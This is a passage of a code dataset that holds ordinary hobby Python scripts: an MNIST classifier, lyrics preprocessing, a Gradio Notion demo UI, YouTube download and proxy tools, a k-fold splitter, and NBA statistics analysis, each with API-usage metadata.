"pandas.to_numeric", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.number", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 64, "usage_type": "call"}, {"api_name": "scipy.stats.zscore", "line_number": 64, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 64, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 79, "usage_type": "call"}, {"api_name": "ProblemFinder.ProblemFinder", "line_number": 80, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 197, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 202, "usage_type": "attribute"}]} +{"seq_id": "475684328", "text": "import tensorflow as tf\nimport os\nfrom matplotlib import pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport numpy as np\nimport random\nfrom sklearn.metrics import accuracy_score\nimport pandas as pd \n\nmnist = tf.keras.datasets.mnist\n(x_train, y_train),(x_test, y_test) = mnist.load_data()\nx_train, x_test = x_train / 255.0, x_test / 255.0 #normalization of pixels \nmodel = tf.keras.models.Sequential([\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(512, activation=tf.nn.relu), #changed to relu,sigmoid,tanh\n tf.keras.layers.Dropout(0.2), #to prevent overfitting\n tf.keras.layers.Dense(10, activation=tf.nn.softmax) #output layer\n])\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\nlog = model.fit(x_train, y_train, epochs=5)\nmodel.evaluate(x_test, y_test)\n# plotting the metrics of the model\nfig = plt.figure()\nplt.subplot(2,1,1)\nplt.plot(log.history['acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.subplot(2,1,2)\nplt.plot(log.history['loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.tight_layout()\nfig\n\npreds_1 = model.predict(x_test) #predict the output values\nnew_1 = np.zeros((len(preds_1)))\nfor i in range(len(preds_1)):\n new_1[i]=np.argmax(preds_1[i]) # take the element with max probability value in each row and store it in a new array\n#predicted_value = pd.DataFrame(new_1)\n#predicted_value.to_csv(r\"C:\\Users\\aditya vikram\\Desktop\\nn_predvalues_mnist.csv\")\nacc_1 = accuracy_score(y_test,new_1)\nprint(\"accuracy MNIST dataset:\",acc_1)\nfrom sklearn.metrics import confusion_matrix\nb = confusion_matrix(y_test,new_1)\nprint(b)\n\nfrom PIL import Image\nUSPSMat = []\nUSPSTar = []\ncurPath = r'C:\\Users\\aditya vikram\\Desktop\\ML_project3\\USPSdata\\USPSdata\\Numerals'\nsavedImg = []\nfor j in range(0,10):\n curFolderPath = curPath + '/' + str(j)\n imgs = os.listdir(curFolderPath)\n for img in imgs:\n curImg = curFolderPath + '/' + img\n if curImg[-3:] == 'png':\n img = Image.open(curImg,'r')\n img = img.resize((28, 28))\n savedImg = img\n imgdata = (255-np.array(img.getdata()))/255\n USPSMat.append(imgdata)\n USPSTar.append(j)\narr_mat = np.asarray(USPSMat)\n#print(arr_mat.shape)\nmatrixvalues = np.reshape(arr_mat,(19999,28,28))\n#matrixvalues.shape\n\nscore = model.evaluate(matrixvalues, USPSTar)\n\npreds = model.predict(matrixvalues)\n\nnew = np.zeros((len(preds)))\nfor i in range(len(preds)):\n new[i]=np.argmax(preds[i]) \n#predicted_value = pd.DataFrame(new)\n#predicted_value.to_csv(r\"C:\\Users\\aditya vikram\\Desktop\\nn_predvalues_usps.csv\")\n\n\nusps_tar = np.asarray(USPSTar)\n\n\nacc = accuracy_score(usps_tar, new)\nprint(\"accuracy USPS dataset:\",acc) #accuracy usps data\nfrom sklearn.metrics import confusion_matrix\na = confusion_matrix(usps_tar,new)\nprint(a)\n\n", "repo_name": "aditya-vikram-parakala/MachineLearning_CSE574", "sub_path": "neural_dnn.py", "file_name": "neural_dnn.py", "file_ext": "py", "file_size_in_byte": 2948, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "tensorflow.keras", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 14, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 15, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 15, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 17, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 17, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 17, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 42, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 48, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 58, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 62, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "71254674364", "text": "import pandas as pd\nimport re\nimport markovify\nfrom nltk import word_tokenize, download\ndownload('punkt')\n\n\ndef format_lyrics(lyric):\n lyric = re.sub('\\r\\n\\r\\n', ' xxsectionxx ', lyric) # delimit verses\n lyric = re.sub('\\r\\n', ' xxlinexx ', lyric) # delimit lines\n lyric = re.sub('\\[[()&a-zA-Z0-9 :.-]+\\]', '', lyric) # remove notes in []\n # need to only remove individual [] sets, not things between two notes\n lyric = lyric.lower()\n lyric = re.sub(\"'\", '', lyric)\n lyric = re.sub(\"\\x92\", '', lyric)\n lyric = word_tokenize(lyric)\n return lyric\n\nif __name__=='__main__':\n song_data = pd.read_csv('rapper/data/songs_and_lyrics.csv', encoding = \"ISO-8859-1\")\n song_data['lyrics'] = [format_lyrics(lyric) for lyric in song_data['lyrics']]\n", "repo_name": "KSafran/b_rabbit_ai", "sub_path": "rapper/format_lyrics.py", "file_name": "format_lyrics.py", "file_ext": "py", "file_size_in_byte": 769, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "nltk.download", "line_number": 5, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 9, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 10, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 11, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 14, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 15, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "1986272658", "text": "#!/usr/bin/env python3\n# -*- coding : utf-8 -*-\n# author:samge\n# data:2023-03-28 14:40\n# describe:\nimport gradio as gr\n\nfrom gradio_ui.g_utils.common import u_common_layout\nfrom gradio_ui.tabs.notion_demo import u_handler_notion_demo\nfrom utils.u_config import g_config\n\n\ndef create_layout():\n \"\"\" 构建布局 \"\"\"\n with gr.Row().style(equal_height=True):\n with gr.Column(scale=1):\n api_url = gr.Textbox(show_label=True, label=\"代理Url\", placeholder=\"请输入自定义的代理请求地址(如果是部署在国外服务器,可空)\", lines=1, max_lines=1, value=g_config.api_url)\n with gr.Row().style(equal_height=True):\n notion_token = gr.Textbox(show_label=True, label=\"Notion_token_v2\", placeholder=\"请输入Notion的token_v2值\", lines=1, max_lines=1, value=g_config.notion_token)\n space_id = gr.Textbox(show_label=True, label=\"space_id\", placeholder=\"请输入Notion的space_id值\", lines=1, max_lines=1, value=g_config.space_id)\n with gr.Row().style(equal_height=True):\n topic = u_common_layout.get_topic_layout()\n prompt_type = u_common_layout.get_prompt_type_layout()\n with gr.Row().style(equal_height=True):\n tone = u_common_layout.get_tone_layout()\n translate = u_common_layout.get_translate_layout()\n prompt = gr.Textbox(show_label=True, label=\"提示内容(prompt)\", placeholder=\"请输入提示内容(prompt),与topic强相关\", lines=3, max_lines=3)\n context = gr.Textbox(show_label=True, label=\"上下文内容(context)\", placeholder=\"请输入上下文内容(context),与prompt_type、tone、translate强相关,与topic非相关\", lines=6, max_lines=6)\n with gr.Row().style(equal_height=True):\n button_load = gr.Button(\"加载缓存\")\n button = gr.Button(\"生成内容\")\n with gr.Column(scale=1):\n result = gr.Textbox(\n label=\"生成结果\",\n placeholder=\"这里展示生成结果\",\n lines=20,\n max_lines=20\n )\n result_api_info = gr.Textbox(\n label=\"API请求参考\",\n placeholder=\"这里展示API请求的参考信息\",\n lines=10,\n max_lines=10\n )\n button.click(u_handler_notion_demo.handler, inputs=[topic, prompt_type, tone, translate, prompt, context, notion_token, space_id, api_url], outputs=[result, result_api_info])\n button_load.click(u_handler_notion_demo.load, inputs=[], outputs=[topic, prompt_type, tone, translate, prompt, context, notion_token, space_id, api_url])\n", "repo_name": "Samge0/notionai-api-py", "sub_path": "gradio_ui/tabs/notion_demo/u_layout_notion_demo.py", "file_name": "u_layout_notion_demo.py", "file_ext": "py", "file_size_in_byte": 2721, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "gradio.Row", "line_number": 15, "usage_type": "call"}, {"api_name": "gradio.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "gradio.Textbox", "line_number": 17, "usage_type": "call"}, {"api_name": "utils.u_config.g_config.api_url", "line_number": 17, "usage_type": "attribute"}, {"api_name": "utils.u_config.g_config", "line_number": 17, "usage_type": "name"}, {"api_name": "gradio.Row", "line_number": 18, "usage_type": "call"}, {"api_name": "gradio.Textbox", "line_number": 19, "usage_type": "call"}, {"api_name": "utils.u_config.g_config.notion_token", "line_number": 19, "usage_type": "attribute"}, {"api_name": "utils.u_config.g_config", "line_number": 19, "usage_type": "name"}, {"api_name": "gradio.Textbox", "line_number": 20, "usage_type": "call"}, {"api_name": "utils.u_config.g_config.space_id", "line_number": 20, "usage_type": "attribute"}, {"api_name": "utils.u_config.g_config", "line_number": 20, "usage_type": "name"}, {"api_name": "gradio.Row", "line_number": 21, "usage_type": "call"}, {"api_name": "gradio_ui.g_utils.common.u_common_layout.get_topic_layout", "line_number": 22, "usage_type": "call"}, {"api_name": "gradio_ui.g_utils.common.u_common_layout", "line_number": 22, "usage_type": "name"}, {"api_name": "gradio_ui.g_utils.common.u_common_layout.get_prompt_type_layout", "line_number": 23, "usage_type": "call"}, {"api_name": "gradio_ui.g_utils.common.u_common_layout", "line_number": 23, "usage_type": "name"}, {"api_name": "gradio.Row", "line_number": 24, "usage_type": "call"}, {"api_name": "gradio_ui.g_utils.common.u_common_layout.get_tone_layout", "line_number": 25, "usage_type": "call"}, {"api_name": "gradio_ui.g_utils.common.u_common_layout", "line_number": 25, "usage_type": "name"}, {"api_name": "gradio_ui.g_utils.common.u_common_layout.get_translate_layout", "line_number": 26, "usage_type": "call"}, {"api_name": "gradio_ui.g_utils.common.u_common_layout", "line_number": 26, "usage_type": "name"}, {"api_name": "gradio.Textbox", "line_number": 27, "usage_type": "call"}, {"api_name": "gradio.Textbox", "line_number": 28, "usage_type": "call"}, {"api_name": "gradio.Row", "line_number": 29, "usage_type": "call"}, {"api_name": "gradio.Button", "line_number": 30, "usage_type": "call"}, {"api_name": "gradio.Button", "line_number": 31, "usage_type": "call"}, {"api_name": "gradio.Column", "line_number": 32, "usage_type": "call"}, {"api_name": "gradio.Textbox", "line_number": 33, "usage_type": "call"}, {"api_name": "gradio.Textbox", "line_number": 39, "usage_type": "call"}, {"api_name": "gradio_ui.tabs.notion_demo.u_handler_notion_demo.handler", "line_number": 45, "usage_type": "attribute"}, {"api_name": "gradio_ui.tabs.notion_demo.u_handler_notion_demo", "line_number": 45, "usage_type": "name"}, {"api_name": "gradio_ui.tabs.notion_demo.u_handler_notion_demo.load", "line_number": 46, "usage_type": "attribute"}, {"api_name": "gradio_ui.tabs.notion_demo.u_handler_notion_demo", "line_number": 46, "usage_type": "name"}]} +{"seq_id": "4559171575", "text": "#!/usr/bin/env python\n\n\"\"\"\nSimple Youtube streaming proxy\n\nUsage:\n\n1. Run `pip install flask`,\n2. Install youtube-dl (try: `sudo apt-get install youtube-dl`),\n3. Run `python ytproxy.py`,\n4. Point your browser to http://localhost:5000\n\"\"\"\n\nfrom flask import Flask, Response, request, stream_with_context\nimport subprocess\napp = Flask(__name__)\n\n\n@app.route(\"/ytdl\")\ndef hello():\n\n def streamGenerator():\n p = subprocess.Popen(['youtube-dl', request.args['url'], '-o', '-'],\n stdout=subprocess.PIPE)\n while True:\n y = p.stdout.read(1024)\n if y != '':\n yield y\n\n resp = stream_with_context(streamGenerator())\n return Response(resp, mimetype='video/webm')\n\n\n@app.route(\"/\")\ndef index():\n return 'Enter YT URL:
'\n\nif __name__ == \"__main__\":\n app.run()\n", "repo_name": "d33tah/ytproxy.py", "sub_path": "ytproxy.py", "file_name": "ytproxy.py", "file_ext": "py", "file_size_in_byte": 878, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 23, "usage_type": "name"}, {"api_name": "subprocess.PIPE", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.stream_with_context", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "21191584323", "text": "from pytube import YouTube\nfrom colorama import init, Fore\n\n\ndef on_complete(stream, filepath):\n print('download complete')\n print(filepath)\n\ndef on_progress(stream, chunk, bytes_remaining ):\n progress_str = f'{round( 100 - (bytes_remaining / stream.filesize * 100),2)}%'\n print(progress_str)\n\ninit()\n#link = input('Youtube link: ')\nlink = 'https://www.youtube.com/watch?v=3_CpaZfn-mI'\nvideo_obj = YouTube(link, on_complete_callback = on_complete, on_progress_callback = on_progress)\n\n# video information\nprint(Fore.RED + f'title: \\033[39m {video_obj.title}')\nprint(Fore.RED + f'length: \\033[39m {(video_obj.length / 60.2)} minutes ')\nprint(Fore.RED + f'views: \\033[39m {(video_obj.views / 1000000)} milion' )\nprint(Fore.RED + f'author: \\033[39m n {video_obj.author}')\n\n# download\n\nprint(Fore.RED + 'download:' +\n Fore.GREEN + '(b)est \\033[39m| ' +\n Fore.YELLOW + '(w)orst \\033[39m| ' +\n Fore.BLUE + '(a)udio \\033[39m| (e)xit')\n \ndownload_choice = input('Choice: ')\n#\n#match download_choice:\n# case 'b':\n# video_obj.streams.get_highest_resolution().download(r'\\home\\egmj\\Projects\\youtube-download')\n# case 'w':\n# video_obj.streams.get_worst_resolution().download(r'\\home\\egmj\\Projects\\youtube-download')\n# case 'a':\n# video_obj.streams.get_audio_only().download(r'\\home\\egmj\\Projects\\youtube-download')\n#\nif download_choice == 'b':\n video_obj.streams.get_highest_resolution().download(r'/home/egmj/Projects/youtube-download')\nelif download_choice == 'w':\n video_obj.streams.get_lowest_resolution().download(r'/home/egmj/Projects/youtube-download')\nelif download_choice == 'a':\n video_obj.streams.get_audio_only().download(r'/home/egmj/Projects/youtube-download')\nelif download_choice == 'e':\n quit()\n", "repo_name": "EGMJ/youtube-download", "sub_path": "demo.py", "file_name": "demo.py", "file_ext": "py", "file_size_in_byte": 1766, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "colorama.init", "line_number": 13, "usage_type": "call"}, {"api_name": "pytube.YouTube", "line_number": 16, "usage_type": "call"}, {"api_name": "colorama.Fore.RED", "line_number": 19, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 19, "usage_type": "name"}, {"api_name": "colorama.Fore.RED", "line_number": 20, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 20, "usage_type": "name"}, {"api_name": "colorama.Fore.RED", "line_number": 21, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 21, "usage_type": "name"}, {"api_name": "colorama.Fore.RED", "line_number": 22, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 22, "usage_type": "name"}, {"api_name": "colorama.Fore.RED", "line_number": 26, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 26, "usage_type": "name"}, {"api_name": "colorama.Fore.GREEN", "line_number": 27, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 27, "usage_type": "name"}, {"api_name": "colorama.Fore.YELLOW", "line_number": 28, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 28, "usage_type": "name"}, {"api_name": "colorama.Fore.BLUE", "line_number": 29, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "73753346363", "text": "import argparse\n\nimport pandas as pd\nfrom sklearn.model_selection import StratifiedKFold\n\nfrom src.utils.random_seed import SEED\n\nSAVE_DIR = './lists/folds/'\nDATA_PATH = './data/train.csv'\nNUM_FOLDS = 5\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--num_folds', default=NUM_FOLDS)\n parser.add_argument('--seed', default=SEED)\n\n args = parser.parse_args()\n\n num_folds = int(args.num_folds)\n seed = int(args.seed)\n\n df = pd.read_csv(DATA_PATH)\n kf = StratifiedKFold(num_folds, shuffle=True, random_state=seed)\n\n for fold, (train_idx, val_idx) in enumerate(kf.split(df, df.label.values)):\n df.loc[train_idx, :].to_csv(f'{SAVE_DIR}train/train_{fold}.csv', index=False)\n df.loc[val_idx, :].to_csv(f'{SAVE_DIR}val/val_{fold}.csv', index=False)\n", "repo_name": "iamnmt/digit-recognizer", "sub_path": "lists/split_kfold.py", "file_name": "split_kfold.py", "file_ext": "py", "file_size_in_byte": 820, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "src.utils.random_seed.SEED", "line_number": 15, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.model_selection.StratifiedKFold", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "28658717583", "text": "\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder, StandardScaler\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.model_selection import train_test_split\n\nimport category_encoders as ce\noneHotEncoder = ce.OneHotEncoder(cols=[0,1,2])\n\nnp.random.seed(42)\n\nENCODERS_FIT = False\n\nAGE_LIMIT = 2008\n\n\n\ndef evaluate_predictions(y_pred, y_real, buffer):\n \n correct_count = 0\n n = len(y_pred)\n \n for i in range(n):\n \n pred = y_pred[i]\n real = y_real[i]\n \n if real - buffer <= pred and pred <= real + buffer:\n correct_count += 1\n \n return correct_count / n\n \n\ndef get_advanced_stats():\n \n # 2001 -> 2000-2001 season \n \n advanced_stats_by_year = {}\n\n for year2 in range(1995,2020):\n \n year1 = year2 - 1\n \n file_name = \"data/nba_advanced_stats/\"\n file_name += \"nba_advanced_\" + str(year1) + \"_\" + str(year2) + \".csv\"\n \n statsDF = pd.read_csv(file_name)\n \n advanced_stats_by_year[year2] = statsDF\n\n return advanced_stats_by_year\n\ndef get_max_future_stat(stat_name, cur_player, draft_year, advanced_stats_by_year, position, position_filter=None):\n \n # check season and season +- 1, eg 6, then 5, then 7 if need be, else return nil.\n # must be between 2001 and 2019\n \n \n if draft_year > 2016 or draft_year < AGE_LIMIT:\n return None\n \n if position_filter and position != position_filter:\n return None\n \n player_stats = []\n \n valid_years = advanced_stats_by_year.keys()\n talent_development_buffer = 0 # years\n \n for year in range(draft_year + talent_development_buffer, max(valid_years) + 1):\n \n # if year available\n if year in valid_years:\n \n season_stats = advanced_stats_by_year[year]\n playerList = list(season_stats.Player)\n \n # if player played in that year\n if cur_player in playerList:\n \n player_index = playerList.index(cur_player)\n games_played_in_season = season_stats.at[player_index, \"G\"]\n \n # if player played substantial number of games that year\n if games_played_in_season > 25:\n stat_to_return = season_stats.at[player_index, stat_name]\n \n player_stats.append(stat_to_return)\n \n if len(player_stats) <= 0:\n return None\n \n return max(player_stats)\n\n\ndef get_y(data, stat_name, position_filter=None):\n \n \n y = []\n dropped_player_indeces = []\n \n advanced_stats_by_year = get_advanced_stats()\n \n players = list(data.playerName)\n final_college_seasons = list(data.Season)\n positions = list(data.position)\n \n for i in range(len(players)): #len(players)\n \n cur_player = players[i]\n draft_year = int(final_college_seasons[i][0:4]) + 1\n position = positions[i]\n \n \n stat_to_predict = get_max_future_stat(stat_name,\n cur_player,\n draft_year,\n advanced_stats_by_year,\n position,\n position_filter)\n \n if stat_to_predict:\n y.append(stat_to_predict)\n else: \n dropped_player_indeces.append((i, cur_player, draft_year))\n\n \n return (y, dropped_player_indeces)\n\n\n\n# preproess feature set X \ndef preprocess_input(X):\n\n global ENCODERS_FIT\n global oneHotEncoder\n # drop unwanted features\n \n unwanted_columns = [\"playerName\", \"Season\", \"spacer1\", \"transferredSchools\", \"ORB\", \"DRB\"] # \"\\xa0\"\n X = X.drop(unwanted_columns, axis=1)\n\n \n # organize features\n columns = list(X.columns)\n categorical = [\"position\", \"School\", \"Conf\"]\n #diff = lambda l1, l2: [x for x in l1 if x not in l2]\n #numerical = diff(columns, categorical) \n \n \n # cast numerical data as floats\n for col in columns:\n if col not in categorical:\n X[col] = X[col].astype(float)\n \n \n # impute: fill in missing values\n from sklearn.impute import SimpleImputer\n imputer = SimpleImputer(missing_values=np.nan, strategy=\"mean\")\n X = X.values # convert to ndarray of objects \n imputer = imputer.fit(X[:, 3:])\n X[:, 3:] = imputer.transform(X[:, 3:])\n \n \n # scale data #\n X_scaler = StandardScaler()\n X_scaler = X_scaler.fit(X[:, 3:])\n X[:, 3:] = X_scaler.transform(X[:, 3:])\n\n \n \n # encode categorial data #\n \n if not ENCODERS_FIT:\n oneHotEncoder = oneHotEncoder.fit(X)\n X = oneHotEncoder.transform(X)\n ENCODERS_FIT=True\n else:\n X = oneHotEncoder.transform(X)\n \n\n return X\n \n \ndef get_nba_player_names(year_start, year_end):\n\n player_list = []\n \n for yr1 in range(year_start, year_end):\n \n yr2 = yr1 + 1\n file_name = \"data/nba_advanced_stats/\"\n file_name += \"nba_advanced_\" + str(yr1) + \"_\" + str(yr2) + \".csv\"\n \n print(file_name)\n data = pd.read_csv(file_name)\n \n cur_players = list(data.Player)\n \n player_list.extend(cur_players)\n \n player_list = list(set(player_list))\n \n return player_list\n\n\n\n\n\nnba_player_names = get_nba_player_names(2009, 2019)\n\n\n\n\n# Importing the dataset\ndata = pd.read_csv(\"data/college_stats/final_CBB_data.csv\")\n\ncollege_data = data.copy()\n\n# get y\nfuture_stats, dropped_player_indeces = get_y(data, \"WS\")\n\n\n# drop players from X if they didnt qualify for y\nfor index, player, year in dropped_player_indeces:\n print(\"dropping \", player)\n college_data = college_data.drop([index], axis=0)\n \n \n\ncollege_stat_type = \"TRB\"\n \ncollege_stat = college_data[college_stat_type]\n \n \n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\n\n\nax = sns.scatterplot(x=college_data[college_stat_type], y=future_stats)\nax.set(xlabel=\"college \" + college_stat_type , ylabel='NBA WS')\n\n\n\n\n\n\n\n# Draw a nested barplot to show survival for class and sex\ng = sns.catplot(x=\"college AST\", y=\"pred\", hue=\"player\", data=graphData,\n height=6, kind=\"bar\", palette=\"muted\")\ng.despine(left=True)\ng.set_ylabels(\"Win Shares\")\n \nsns.set(style=\"whitegrid\")\n\n \n \n \n \n \n##################### get correlation ############################\n \nfrom scipy.stats import pearsonr\n\ncolumns = list(college_data.columns)\ndiff = lambda l1, l2: [x for x in l1 if x not in l2]\ncolumns = diff(columns, [\"spacer1\", \"playerName\", \"Season\", \"School\", \"Conf\", \"position\"])\n\n\nfrom sklearn.impute import SimpleImputer\n\n\n\ncorrs = []\nps = []\nfor coll_stat in columns:\n print(coll_stat)\n stat = np.array(college_data[coll_stat])\n \n imputer = SimpleImputer(missing_values=np.nan, strategy=\"mean\")\n\n\n imputer = imputer.fit(stat.reshape(-1, 1))\n stat = imputer.transform(stat.reshape(-1, 1))\n stat = stat.reshape(1228)\n \n print(stat)\n correlation = pearsonr(stat, future_stats)\n\n\n corrs.append(correlation[0])\n ps.append(correlation[1])\n \n \n \npredDF = pd.DataFrame()\npredDF[\"college stat name\"] = columns\npredDF[\"correlation\"] = corrs\npredDF[\"ps\"] = ps\n\npredDF = predDF.sort_values(by=\"correlation\", ascending=False)\n \n##################### /get correlation ############################\n \n \n \n \n \n \n \n \n \n\n\n\n \ngraphData = pd.DataFrame()\n\ngraphData[\"college AST\"] = college_stat\ngraphData[\"NBA WS\"] = future_stats\n\n \n \nimport seaborn as sns\nsns.set(style=\"ticks\")\n\ndf = sns.load_dataset(\"iris\")\nsns.pairplot(df, hue=\"species\")\n \n \n\n \n \n \n \n \n \n \n \n \n ", "repo_name": "cademay/deepLearningNbaDraft", "sub_path": "finalProject/src/untitled1.py", "file_name": "untitled1.py", "file_ext": "py", "file_size_in_byte": 7986, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "category_encoders.OneHotEncoder", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 53, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 164, "usage_type": "attribute"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 201, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 221, "usage_type": "call"}, {"api_name": "seaborn.scatterplot", "line_number": 248, "usage_type": "call"}, {"api_name": "seaborn.catplot", "line_number": 258, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 287, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 289, "usage_type": "attribute"}, {"api_name": "scipy.stats.pearsonr", "line_number": 297, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 305, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 326, "usage_type": "call"}, {"api_name": 